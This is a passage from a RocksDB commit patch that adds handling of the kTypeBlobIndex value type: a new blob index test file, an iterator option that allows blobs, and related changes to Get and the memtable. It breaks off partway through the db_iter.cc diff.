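  rocksdb::Status s = rocksdb::WriteBatchInternal::PutBlobIndex(
      &batch, cf_id, "blob_key", "blob_index");
  assert(s.ok());
  s = db->Write(rocksdb::WriteOptions(), &batch);
  assert(s.ok());

  // A plain Get() does not understand blob indexes and reports NotSupported.
  rocksdb::PinnableSlice value;
  s = db->Get(rocksdb::ReadOptions(), cfh, "blob_key", &value);
  assert(s.IsNotSupported());

  // Passing is_blob_index opts in: the raw blob index is returned and the
  // flag reports that the stored value is of kTypeBlobIndex type.
  bool is_blob_index = false;
  s = db->GetImpl(rocksdb::ReadOptions(), cfh, "blob_key", &value,
                  nullptr /*value_found*/, &is_blob_index);
  assert(s.ok() && is_blob_index);
}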
Closes https://github.com/facebook/rocksdb/pull/2886 Differential Revision: D5838431 Pulled By: yiwu-arbug fbshipit-source-id: 3c5306c62bc13bb11abc03422ec5cbcea1203cca --- CMakeLists.txt | 1 + Makefile | 4 + TARGETS | 1 + db/compaction_iterator.cc | 2 + db/db_blob_index_test.cc | 407 ++++++++++++++++++++++++++++++ db/db_impl.cc | 158 ++++++------ db/db_impl.h | 13 +- db/db_impl_debug.cc | 9 + db/db_iter.cc | 99 ++++++-- db/db_iter.h | 15 +- db/dbformat.cc | 2 +- db/dbformat.h | 4 +- db/memtable.cc | 24 +- db/memtable.h | 8 +- db/memtable_list.cc | 18 +- db/memtable_list.h | 10 +- db/version_set.cc | 10 +- db/version_set.h | 3 +- db/write_batch.cc | 64 ++++- db/write_batch_internal.h | 3 + include/rocksdb/listener.h | 1 + include/rocksdb/write_batch.h | 6 + table/get_context.cc | 28 +- table/get_context.h | 7 +- utilities/blob_db/blob_db_test.cc | 2 +- 25 files changed, 753 insertions(+), 146 deletions(-) create mode 100644 db/db_blob_index_test.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 31ab5abb8f5..ab2177b886e 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -713,6 +713,7 @@ if(WITH_TESTS) db/corruption_test.cc db/cuckoo_table_db_test.cc db/db_basic_test.cc + db/db_blob_index_test.cc db/db_block_cache_test.cc db/db_bloom_filter_test.cc db/db_compaction_filter_test.cc diff --git a/Makefile b/Makefile index a657fad72b5..5a89f6bf79d 100644 --- a/Makefile +++ b/Makefile @@ -360,6 +360,7 @@ TESTS = \ db_wal_test \ db_block_cache_test \ db_test \ + db_blob_index_test \ db_bloom_filter_test \ db_iter_test \ db_log_iter_test \ @@ -1063,6 +1064,9 @@ db_test: db/db_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) db_test2: db/db_test2.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) +db_blob_index_test: db/db_blob_index_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) + $(AM_LINK) + db_block_cache_test: db/db_block_cache_test.o db/db_test_util.o $(LIBOBJECTS) $(TESTHARNESS) $(AM_LINK) diff --git a/TARGETS b/TARGETS index 3fac4a73785..ac85eab93c7 100644 --- a/TARGETS +++ b/TARGETS @@ -367,6 +367,7 @@ ROCKS_TESTS = [['arena_test', 'util/arena_test.cc', 'serial'], ['cuckoo_table_reader_test', 'table/cuckoo_table_reader_test.cc', 'serial'], ['date_tiered_test', 'utilities/date_tiered/date_tiered_test.cc', 'serial'], ['db_basic_test', 'db/db_basic_test.cc', 'serial'], + ['db_blob_index_test', 'db/db_blob_index_test.cc', 'serial'], ['db_block_cache_test', 'db/db_block_cache_test.cc', 'serial'], ['db_bloom_filter_test', 'db/db_bloom_filter_test.cc', 'serial'], ['db_compaction_filter_test', 'db/db_compaction_filter_test.cc', 'parallel'], diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 54726029227..8eac637c426 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -25,6 +25,8 @@ CompactionEventListener::CompactionListenerValueType fromInternalValueType( kSingleDelete; case kTypeRangeDeletion: return CompactionEventListener::CompactionListenerValueType::kRangeDelete; + case kTypeBlobIndex: + return CompactionEventListener::CompactionListenerValueType::kBlobIndex; default: assert(false); return CompactionEventListener::CompactionListenerValueType::kInvalid; diff --git a/db/db_blob_index_test.cc b/db/db_blob_index_test.cc new file mode 100644 index 00000000000..bfc95760c02 --- /dev/null +++ b/db/db_blob_index_test.cc @@ -0,0 +1,407 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +// +// Copyright (c) 2011 The LevelDB Authors. All rights reserved. +// Use of this source code is governed by a BSD-style license that can be +// found in the LICENSE file. See the AUTHORS file for names of contributors. + +#include +#include +#include +#include + +#include "db/column_family.h" +#include "db/db_iter.h" +#include "db/db_test_util.h" +#include "db/dbformat.h" +#include "db/write_batch_internal.h" +#include "port/port.h" +#include "port/stack_trace.h" +#include "util/string_util.h" +#include "utilities/merge_operators.h" + +namespace rocksdb { + +// kTypeBlobIndex is a value type used by BlobDB only. The base rocksdb +// should accept the value type on write, and report not supported value +// for reads, unless caller request for it explicitly. The base rocksdb +// doesn't understand format of actual blob index (the value). +class DBBlobIndexTest : public DBTestBase { + public: + enum Tier { + kMemtable = 0, + kImmutableMemtables = 1, + kL0SstFile = 2, + kLnSstFile = 3, + }; + const std::vector kAllTiers = {Tier::kMemtable, + Tier::kImmutableMemtables, + Tier::kL0SstFile, Tier::kLnSstFile}; + + DBBlobIndexTest() : DBTestBase("/db_blob_index_test") {} + + ColumnFamilyHandle* cfh() { return dbfull()->DefaultColumnFamily(); } + + ColumnFamilyData* cfd() { + return reinterpret_cast(cfh())->cfd(); + } + + Status PutBlobIndex(WriteBatch* batch, const Slice& key, + const Slice& blob_index) { + return WriteBatchInternal::PutBlobIndex(batch, cfd()->GetID(), key, + blob_index); + } + + Status Write(WriteBatch* batch) { + return dbfull()->Write(WriteOptions(), batch); + } + + std::string GetImpl(const Slice& key, bool* is_blob_index = nullptr, + const Snapshot* snapshot = nullptr) { + ReadOptions read_options; + read_options.snapshot = snapshot; + PinnableSlice value; + auto s = dbfull()->GetImpl(read_options, cfh(), key, &value, + nullptr /*value_found*/, is_blob_index); + if (s.IsNotFound()) { + return "NOT_FOUND"; + } + if (s.IsNotSupported()) { + return "NOT_SUPPORTED"; + } + if (!s.ok()) { + return s.ToString(); + } + return value.ToString(); + } + + std::string GetBlobIndex(const Slice& key, + const Snapshot* snapshot = nullptr) { + bool is_blob_index = false; + std::string value = GetImpl(key, &is_blob_index, snapshot); + if (!is_blob_index) { + return "NOT_BLOB"; + } + return value; + } + + ArenaWrappedDBIter* GetBlobIterator() { + return dbfull()->NewIteratorImpl(ReadOptions(), cfd(), + dbfull()->GetLatestSequenceNumber(), + true /*allow_blob*/); + } + + Options GetTestOptions() { + Options options; + options.create_if_missing = true; + options.num_levels = 2; + options.disable_auto_compactions = true; + // Disable auto flushes. 
+ options.max_write_buffer_number = 10; + options.min_write_buffer_number_to_merge = 10; + options.merge_operator = MergeOperators::CreateStringAppendOperator(); + return options; + } + + void MoveDataTo(Tier tier) { + switch (tier) { + case Tier::kMemtable: + break; + case Tier::kImmutableMemtables: + ASSERT_OK(dbfull()->TEST_SwitchMemtable()); + break; + case Tier::kL0SstFile: + ASSERT_OK(Flush()); + break; + case Tier::kLnSstFile: + ASSERT_OK(Flush()); + ASSERT_OK(Put("a", "dummy")); + ASSERT_OK(Put("z", "dummy")); + ASSERT_OK(Flush()); + ASSERT_OK( + dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); + ASSERT_EQ("0,1", FilesPerLevel()); + break; + } + } +}; + +// Should be able to write kTypeBlobIndex to memtables and SST files. +TEST_F(DBBlobIndexTest, Write) { + for (auto tier : kAllTiers) { + DestroyAndReopen(GetTestOptions()); + for (int i = 1; i <= 5; i++) { + std::string index = ToString(i); + WriteBatch batch; + ASSERT_OK(PutBlobIndex(&batch, "key" + index, "blob" + index)); + ASSERT_OK(Write(&batch)); + } + MoveDataTo(tier); + for (int i = 1; i <= 5; i++) { + std::string index = ToString(i); + ASSERT_EQ("blob" + index, GetBlobIndex("key" + index)); + } + } +} + +// Get should be able to return blob index if is_blob_index is provided, +// otherwise return Status::NotSupported status. +TEST_F(DBBlobIndexTest, Get) { + for (auto tier : kAllTiers) { + DestroyAndReopen(GetTestOptions()); + WriteBatch batch; + ASSERT_OK(batch.Put("key", "value")); + ASSERT_OK(PutBlobIndex(&batch, "blob_key", "blob_index")); + ASSERT_OK(Write(&batch)); + MoveDataTo(tier); + // Verify normal value + bool is_blob_index = false; + PinnableSlice value; + ASSERT_EQ("value", Get("key")); + ASSERT_EQ("value", GetImpl("key")); + ASSERT_EQ("value", GetImpl("key", &is_blob_index)); + ASSERT_FALSE(is_blob_index); + // Verify blob index + ASSERT_TRUE(Get("blob_key", &value).IsNotSupported()); + ASSERT_EQ("NOT_SUPPORTED", GetImpl("blob_key")); + ASSERT_EQ("blob_index", GetImpl("blob_key", &is_blob_index)); + ASSERT_TRUE(is_blob_index); + } +} + +// Get should NOT return Status::NotSupported if blob index is updated with +// a normal value. +TEST_F(DBBlobIndexTest, Updated) { + for (auto tier : kAllTiers) { + DestroyAndReopen(GetTestOptions()); + WriteBatch batch; + for (int i = 0; i < 10; i++) { + ASSERT_OK(PutBlobIndex(&batch, "key" + ToString(i), "blob_index")); + } + ASSERT_OK(Write(&batch)); + // Avoid blob values from being purged. 
+ const Snapshot* snapshot = dbfull()->GetSnapshot(); + ASSERT_OK(Put("key1", "new_value")); + ASSERT_OK(Merge("key2", "a")); + ASSERT_OK(Merge("key2", "b")); + ASSERT_OK(Merge("key2", "c")); + ASSERT_OK(Delete("key3")); + ASSERT_OK(SingleDelete("key4")); + ASSERT_OK(Delete("key5")); + ASSERT_OK(Merge("key5", "a")); + ASSERT_OK(Merge("key5", "b")); + ASSERT_OK(Merge("key5", "c")); + ASSERT_OK(dbfull()->DeleteRange(WriteOptions(), cfh(), "key6", "key9")); + MoveDataTo(tier); + for (int i = 0; i < 10; i++) { + ASSERT_EQ("blob_index", GetBlobIndex("key" + ToString(i), snapshot)); + } + ASSERT_EQ("new_value", Get("key1")); + ASSERT_EQ("NOT_SUPPORTED", GetImpl("key2")); + ASSERT_EQ("NOT_FOUND", Get("key3")); + ASSERT_EQ("NOT_FOUND", Get("key4")); + ASSERT_EQ("a,b,c", GetImpl("key5")); + for (int i = 6; i < 9; i++) { + ASSERT_EQ("NOT_FOUND", Get("key" + ToString(i))); + } + ASSERT_EQ("blob_index", GetBlobIndex("key9")); + dbfull()->ReleaseSnapshot(snapshot); + } +} + +// Iterator should get blob value if allow_blob flag is set, +// otherwise return Status::NotSupported status. +TEST_F(DBBlobIndexTest, Iterate) { + const std::vector> data = { + /*00*/ {kTypeValue}, + /*01*/ {kTypeBlobIndex}, + /*02*/ {kTypeValue}, + /*03*/ {kTypeBlobIndex, kTypeValue}, + /*04*/ {kTypeValue}, + /*05*/ {kTypeValue, kTypeBlobIndex}, + /*06*/ {kTypeValue}, + /*07*/ {kTypeDeletion, kTypeBlobIndex}, + /*08*/ {kTypeValue}, + /*09*/ {kTypeSingleDeletion, kTypeBlobIndex}, + /*10*/ {kTypeValue}, + /*11*/ {kTypeMerge, kTypeMerge, kTypeMerge, kTypeBlobIndex}, + /*12*/ {kTypeValue}, + /*13*/ + {kTypeMerge, kTypeMerge, kTypeMerge, kTypeDeletion, kTypeBlobIndex}, + /*14*/ {kTypeValue}, + /*15*/ {kTypeBlobIndex}, + /*16*/ {kTypeValue}, + }; + + auto get_key = [](int index) { + char buf[20]; + snprintf(buf, sizeof(buf), "%02d", index); + return "key" + std::string(buf); + }; + + auto get_value = [&](int index, int version) { + return get_key(index) + "_value" + ToString(version); + }; + + auto check_iterator = [&](Iterator* iterator, Status::Code expected_status, + const Slice& expected_value) { + ASSERT_EQ(expected_status, iterator->status().code()); + if (expected_status == Status::kOk) { + ASSERT_TRUE(iterator->Valid()); + ASSERT_EQ(expected_value, iterator->value()); + } else { + ASSERT_FALSE(iterator->Valid()); + } + }; + + auto create_normal_iterator = [&]() -> Iterator* { + return dbfull()->NewIterator(ReadOptions()); + }; + + auto create_blob_iterator = [&]() -> Iterator* { return GetBlobIterator(); }; + + auto check_is_blob = [&](bool is_blob) { + return [is_blob](Iterator* iterator) { + ASSERT_EQ(is_blob, + reinterpret_cast(iterator)->IsBlob()); + }; + }; + + auto verify = [&](int index, Status::Code expected_status, + const Slice& forward_value, const Slice& backward_value, + std::function create_iterator, + std::function extra_check = nullptr) { + // Seek + auto* iterator = create_iterator(); + ASSERT_OK(iterator->Refresh()); + iterator->Seek(get_key(index)); + check_iterator(iterator, expected_status, forward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + + // Next + iterator = create_iterator(); + ASSERT_OK(iterator->Refresh()); + iterator->Seek(get_key(index - 1)); + ASSERT_TRUE(iterator->Valid()); + iterator->Next(); + check_iterator(iterator, expected_status, forward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + + // SeekForPrev + iterator = create_iterator(); + ASSERT_OK(iterator->Refresh()); + iterator->SeekForPrev(get_key(index)); + 
check_iterator(iterator, expected_status, backward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + + // Prev + iterator = create_iterator(); + iterator->Seek(get_key(index + 1)); + ASSERT_TRUE(iterator->Valid()); + iterator->Prev(); + check_iterator(iterator, expected_status, backward_value); + if (extra_check) { + extra_check(iterator); + } + delete iterator; + }; + + for (auto tier : {Tier::kMemtable} /*kAllTiers*/) { + // Avoid values from being purged. + std::vector snapshots; + DestroyAndReopen(GetTestOptions()); + + // fill data + for (int i = 0; i < static_cast(data.size()); i++) { + for (int j = static_cast(data[i].size()) - 1; j >= 0; j--) { + std::string key = get_key(i); + std::string value = get_value(i, j); + WriteBatch batch; + switch (data[i][j]) { + case kTypeValue: + ASSERT_OK(Put(key, value)); + break; + case kTypeDeletion: + ASSERT_OK(Delete(key)); + break; + case kTypeSingleDeletion: + ASSERT_OK(SingleDelete(key)); + break; + case kTypeMerge: + ASSERT_OK(Merge(key, value)); + break; + case kTypeBlobIndex: + ASSERT_OK(PutBlobIndex(&batch, key, value)); + ASSERT_OK(Write(&batch)); + break; + default: + assert(false); + }; + } + snapshots.push_back(dbfull()->GetSnapshot()); + } + ASSERT_OK( + dbfull()->DeleteRange(WriteOptions(), cfh(), get_key(15), get_key(16))); + snapshots.push_back(dbfull()->GetSnapshot()); + MoveDataTo(tier); + + // Normal iterator + verify(1, Status::kNotSupported, "", "", create_normal_iterator); + verify(3, Status::kNotSupported, "", "", create_normal_iterator); + verify(5, Status::kOk, get_value(5, 0), get_value(5, 0), + create_normal_iterator); + verify(7, Status::kOk, get_value(8, 0), get_value(6, 0), + create_normal_iterator); + verify(9, Status::kOk, get_value(10, 0), get_value(8, 0), + create_normal_iterator); + verify(11, Status::kNotSupported, "", "", create_normal_iterator); + verify(13, Status::kOk, + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + create_normal_iterator); + verify(15, Status::kOk, get_value(16, 0), get_value(14, 0), + create_normal_iterator); + + // Iterator with blob support + verify(1, Status::kOk, get_value(1, 0), get_value(1, 0), + create_blob_iterator, check_is_blob(true)); + verify(3, Status::kOk, get_value(3, 0), get_value(3, 0), + create_blob_iterator, check_is_blob(true)); + verify(5, Status::kOk, get_value(5, 0), get_value(5, 0), + create_blob_iterator, check_is_blob(false)); + verify(7, Status::kOk, get_value(8, 0), get_value(6, 0), + create_blob_iterator, check_is_blob(false)); + verify(9, Status::kOk, get_value(10, 0), get_value(8, 0), + create_blob_iterator, check_is_blob(false)); + verify(11, Status::kNotSupported, "", "", create_blob_iterator); + verify(13, Status::kOk, + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + get_value(13, 2) + "," + get_value(13, 1) + "," + get_value(13, 0), + create_blob_iterator, check_is_blob(false)); + verify(15, Status::kOk, get_value(16, 0), get_value(14, 0), + create_blob_iterator, check_is_blob(false)); + + for (auto* snapshot : snapshots) { + dbfull()->ReleaseSnapshot(snapshot); + } + } +} + +} // namespace rocksdb + +int main(int argc, char** argv) { + rocksdb::port::InstallStackTraceHandler(); + ::testing::InitGoogleTest(&argc, argv); + return RUN_ALL_TESTS(); +} diff --git a/db/db_impl.cc b/db/db_impl.cc index 4aba14c6077..688bc51fad8 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -909,7 +909,8 @@ Status 
DBImpl::Get(const ReadOptions& read_options, Status DBImpl::GetImpl(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, - PinnableSlice* pinnable_val, bool* value_found) { + PinnableSlice* pinnable_val, bool* value_found, + bool* is_blob_index) { assert(pinnable_val != nullptr); StopWatch sw(env_, stats_, DB_GET); PERF_TIMER_GUARD(get_snapshot_time); @@ -959,13 +960,13 @@ Status DBImpl::GetImpl(const ReadOptions& read_options, bool done = false; if (!skip_memtable) { if (sv->mem->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context, - &range_del_agg, read_options)) { + &range_del_agg, read_options, is_blob_index)) { done = true; pinnable_val->PinSelf(); RecordTick(stats_, MEMTABLE_HIT); } else if ((s.ok() || s.IsMergeInProgress()) && sv->imm->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context, - &range_del_agg, read_options)) { + &range_del_agg, read_options, is_blob_index)) { done = true; pinnable_val->PinSelf(); RecordTick(stats_, MEMTABLE_HIT); @@ -977,7 +978,8 @@ Status DBImpl::GetImpl(const ReadOptions& read_options, if (!done) { PERF_TIMER_GUARD(get_from_output_files_time); sv->current->Get(read_options, lkey, pinnable_val, &s, &merge_context, - &range_del_agg, value_found); + &range_del_agg, value_found, nullptr, nullptr, + is_blob_index); RecordTick(stats_, MEMTABLE_MISS); } @@ -1417,73 +1419,79 @@ Iterator* DBImpl::NewIterator(const ReadOptions& read_options, #endif } else { SequenceNumber latest_snapshot = versions_->LastSequence(); - SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_); - auto snapshot = read_options.snapshot != nullptr - ? reinterpret_cast( - read_options.snapshot)->number_ + ? reinterpret_cast(read_options.snapshot) + ->number_ : latest_snapshot; - - // Try to generate a DB iterator tree in continuous memory area to be - // cache friendly. Here is an example of result: - // +-------------------------------+ - // | | - // | ArenaWrappedDBIter | - // | + | - // | +---> Inner Iterator ------------+ - // | | | | - // | | +-- -- -- -- -- -- -- --+ | - // | +--- | Arena | | - // | | | | - // | Allocated Memory: | | - // | | +-------------------+ | - // | | | DBIter | <---+ - // | | + | - // | | | +-> iter_ ------------+ - // | | | | | - // | | +-------------------+ | - // | | | MergingIterator | <---+ - // | | + | - // | | | +->child iter1 ------------+ - // | | | | | | - // | | +->child iter2 ----------+ | - // | | | | | | | - // | | | +->child iter3 --------+ | | - // | | | | | | - // | | +-------------------+ | | | - // | | | Iterator1 | <--------+ - // | | +-------------------+ | | - // | | | Iterator2 | <------+ - // | | +-------------------+ | - // | | | Iterator3 | <----+ - // | | +-------------------+ - // | | | - // +-------+-----------------------+ - // - // ArenaWrappedDBIter inlines an arena area where all the iterators in - // the iterator tree are allocated in the order of being accessed when - // querying. - // Laying out the iterators in the order of being accessed makes it more - // likely that any iterator pointer is close to the iterator it points to so - // that they are likely to be in the same cache line and/or page. - ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), snapshot, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number, - ((read_options.snapshot != nullptr) ? 
nullptr : this), cfd); - - InternalIterator* internal_iter = - NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), - db_iter->GetRangeDelAggregator()); - db_iter->SetIterUnderDBIter(internal_iter); - - return db_iter; + return NewIteratorImpl(read_options, cfd, snapshot); } // To stop compiler from complaining return nullptr; } +ArenaWrappedDBIter* DBImpl::NewIteratorImpl(const ReadOptions& read_options, + ColumnFamilyData* cfd, + SequenceNumber snapshot, + bool allow_blob) { + SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_); + + // Try to generate a DB iterator tree in continuous memory area to be + // cache friendly. Here is an example of result: + // +-------------------------------+ + // | | + // | ArenaWrappedDBIter | + // | + | + // | +---> Inner Iterator ------------+ + // | | | | + // | | +-- -- -- -- -- -- -- --+ | + // | +--- | Arena | | + // | | | | + // | Allocated Memory: | | + // | | +-------------------+ | + // | | | DBIter | <---+ + // | | + | + // | | | +-> iter_ ------------+ + // | | | | | + // | | +-------------------+ | + // | | | MergingIterator | <---+ + // | | + | + // | | | +->child iter1 ------------+ + // | | | | | | + // | | +->child iter2 ----------+ | + // | | | | | | | + // | | | +->child iter3 --------+ | | + // | | | | | | + // | | +-------------------+ | | | + // | | | Iterator1 | <--------+ + // | | +-------------------+ | | + // | | | Iterator2 | <------+ + // | | +-------------------+ | + // | | | Iterator3 | <----+ + // | | +-------------------+ + // | | | + // +-------+-----------------------+ + // + // ArenaWrappedDBIter inlines an arena area where all the iterators in + // the iterator tree are allocated in the order of being accessed when + // querying. + // Laying out the iterators in the order of being accessed makes it more + // likely that any iterator pointer is close to the iterator it points to so + // that they are likely to be in the same cache line and/or page. + ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( + env_, read_options, *cfd->ioptions(), snapshot, + sv->mutable_cf_options.max_sequential_skip_in_iterations, + sv->version_number, ((read_options.snapshot != nullptr) ? nullptr : this), + cfd, allow_blob); + + InternalIterator* internal_iter = + NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), + db_iter->GetRangeDelAggregator()); + db_iter->SetIterUnderDBIter(internal_iter); + + return db_iter; +} + Status DBImpl::NewIterators( const ReadOptions& read_options, const std::vector& column_families, @@ -1527,28 +1535,16 @@ Status DBImpl::NewIterators( #endif } else { SequenceNumber latest_snapshot = versions_->LastSequence(); + auto snapshot = + read_options.snapshot != nullptr + ? reinterpret_cast(read_options.snapshot) + ->number_ + : latest_snapshot; for (size_t i = 0; i < column_families.size(); ++i) { auto* cfd = reinterpret_cast( column_families[i])->cfd(); - SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_); - - auto snapshot = - read_options.snapshot != nullptr - ? reinterpret_cast( - read_options.snapshot)->number_ - : latest_snapshot; - - ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), snapshot, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number, - ((read_options.snapshot != nullptr) ? 
nullptr : this), cfd); - InternalIterator* internal_iter = - NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), - db_iter->GetRangeDelAggregator()); - db_iter->SetIterUnderDBIter(internal_iter); - iterators->push_back(db_iter); + iterators->push_back(NewIteratorImpl(read_options, cfd, snapshot)); } } diff --git a/db/db_impl.h b/db/db_impl.h index 39c1d6103f9..76b52b8b83f 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -52,6 +52,7 @@ namespace rocksdb { +class ArenaWrappedDBIter; class MemTable; class TableCache; class Version; @@ -123,6 +124,7 @@ class DBImpl : public DB { ColumnFamilyHandle* column_family, const Slice& key, std::string* value, bool* value_found = nullptr) override; + using DB::NewIterator; virtual Iterator* NewIterator(const ReadOptions& options, ColumnFamilyHandle* column_family) override; @@ -130,6 +132,11 @@ class DBImpl : public DB { const ReadOptions& options, const std::vector& column_families, std::vector* iterators) override; + ArenaWrappedDBIter* NewIteratorImpl(const ReadOptions& options, + ColumnFamilyData* cfd, + SequenceNumber snapshot, + bool allow_blob = false); + virtual const Snapshot* GetSnapshot() override; virtual void ReleaseSnapshot(const Snapshot* snapshot) override; using DB::GetProperty; @@ -341,6 +348,8 @@ class DBImpl : public DB { return alive_log_files_.begin()->getting_flushed; } + Status TEST_SwitchMemtable(ColumnFamilyData* cfd = nullptr); + // Force current memtable contents to be flushed. Status TEST_FlushMemTable(bool wait = true, ColumnFamilyHandle* cfh = nullptr); @@ -644,7 +653,9 @@ class DBImpl : public DB { friend struct SuperVersion; friend class CompactedDBImpl; #ifndef NDEBUG + friend class DBTest2_ReadCallbackTest_Test; friend class XFTransactionWriteHandler; + friend class DBBlobIndexTest; #endif struct CompactionState; @@ -1245,7 +1256,7 @@ class DBImpl : public DB { // Note: 'value_found' from KeyMayExist propagates here Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value, - bool* value_found = nullptr); + bool* value_found = nullptr, bool* is_blob_index = nullptr); bool GetIntPropertyInternal(ColumnFamilyData* cfd, const DBPropertyInfo& property_info, diff --git a/db/db_impl_debug.cc b/db/db_impl_debug.cc index de5b66f2a6c..a4b378020aa 100644 --- a/db/db_impl_debug.cc +++ b/db/db_impl_debug.cc @@ -80,6 +80,15 @@ Status DBImpl::TEST_CompactRange(int level, const Slice* begin, disallow_trivial_move); } +Status DBImpl::TEST_SwitchMemtable(ColumnFamilyData* cfd) { + WriteContext write_context; + InstrumentedMutexLock l(&mutex_); + if (cfd == nullptr) { + cfd = default_cf_handle_->cfd(); + } + return SwitchMemtable(cfd, &write_context); +} + Status DBImpl::TEST_FlushMemTable(bool wait, ColumnFamilyHandle* cfh) { FlushOptions fo; fo.wait = wait; diff --git a/db/db_iter.cc b/db/db_iter.cc index 33f926ce07f..e4a6c92a7dd 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -8,8 +8,6 @@ // found in the LICENSE file. See the AUTHORS file for names of contributors. 
#include "db/db_iter.h" -#include -#include #include #include @@ -18,7 +16,6 @@ #include "db/merge_helper.h" #include "db/pinned_iterators_manager.h" #include "monitoring/perf_context_imp.h" -#include "port/port.h" #include "rocksdb/env.h" #include "rocksdb/iterator.h" #include "rocksdb/merge_operator.h" @@ -105,7 +102,7 @@ class DBIter: public Iterator { DBIter(Env* _env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const Comparator* cmp, InternalIterator* iter, SequenceNumber s, bool arena_mode, - uint64_t max_sequential_skip_in_iterations) + uint64_t max_sequential_skip_in_iterations, bool allow_blob) : arena_mode_(arena_mode), env_(_env), logger_(cf_options.info_log), @@ -122,7 +119,8 @@ class DBIter: public Iterator { pin_thru_lifetime_(read_options.pin_data), total_order_seek_(read_options.total_order_seek), range_del_agg_(cf_options.internal_comparator, s, - true /* collapse_deletions */) { + true /* collapse_deletions */), + allow_blob_(allow_blob) { RecordTick(statistics_, NO_ITERATORS); prefix_extractor_ = cf_options.prefix_extractor; max_skip_ = max_sequential_skip_in_iterations; @@ -180,6 +178,10 @@ class DBIter: public Iterator { return status_; } } + bool IsBlob() const { + assert(valid_ && (allow_blob_ || !is_blob_)); + return is_blob_; + } virtual Status GetProperty(std::string prop_name, std::string* prop) override { @@ -287,6 +289,8 @@ class DBIter: public Iterator { RangeDelAggregator range_del_agg_; LocalStatistics local_stats_; PinnedIteratorsManager pinned_iters_mgr_; + bool allow_blob_; + bool is_blob_; // No copying allowed DBIter(const DBIter&); @@ -376,6 +380,8 @@ void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) { // - none of the above : saved_key_ can contain anything, it doesn't matter. uint64_t num_skipped = 0; + is_blob_ = false; + do { ParsedInternalKey ikey; @@ -420,6 +426,7 @@ void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) { PERF_COUNTER_ADD(internal_delete_skipped_count, 1); break; case kTypeValue: + case kTypeBlobIndex: saved_key_.SetUserKey( ikey.user_key, !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */); @@ -431,6 +438,18 @@ void DBIter::FindNextUserEntryInternal(bool skipping, bool prefix_check) { skipping = true; num_skipped = 0; PERF_COUNTER_ADD(internal_delete_skipped_count, 1); + } else if (ikey.type == kTypeBlobIndex) { + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + valid_ = false; + } else { + is_blob_ = true; + valid_ = true; + } + return; } else { valid_ = true; return; @@ -572,6 +591,18 @@ void DBIter::MergeValuesNewToOld() { merge_context_.PushOperand(iter_->value(), iter_->IsValuePinned() /* operand_pinned */); PERF_COUNTER_ADD(internal_merge_count, 1); + } else if (kTypeBlobIndex == ikey.type) { + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. 
Please open DB with " + "rocksdb::blob_db::BlobDB instead."); + } else { + status_ = + Status::NotSupported("Blob DB does not support merge operator."); + } + valid_ = false; + return; } else { assert(false); } @@ -678,7 +709,6 @@ void DBIter::PrevInternal() { !iter_->IsKeyPinned() || !pin_thru_lifetime_ /* copy */); if (FindValueForCurrentKey()) { - valid_ = true; if (!iter_->Valid()) { return; } @@ -745,6 +775,7 @@ bool DBIter::FindValueForCurrentKey() { last_key_entry_type = ikey.type; switch (last_key_entry_type) { case kTypeValue: + case kTypeBlobIndex: if (range_del_agg_.ShouldDelete( ikey, RangeDelAggregator::RangePositioningMode::kBackwardTraversal)) { @@ -790,6 +821,7 @@ bool DBIter::FindValueForCurrentKey() { } Status s; + is_blob_ = false; switch (last_key_entry_type) { case kTypeDeletion: case kTypeSingleDeletion: @@ -805,6 +837,18 @@ bool DBIter::FindValueForCurrentKey() { merge_operator_, saved_key_.GetUserKey(), nullptr, merge_context_.GetOperands(), &saved_value_, logger_, statistics_, env_, &pinned_value_, true); + } else if (last_not_merge_type == kTypeBlobIndex) { + if (!allow_blob_) { + ROCKS_LOG_ERROR(logger_, "Encounter unexpected blob index."); + status_ = Status::NotSupported( + "Encounter unexpected blob index. Please open DB with " + 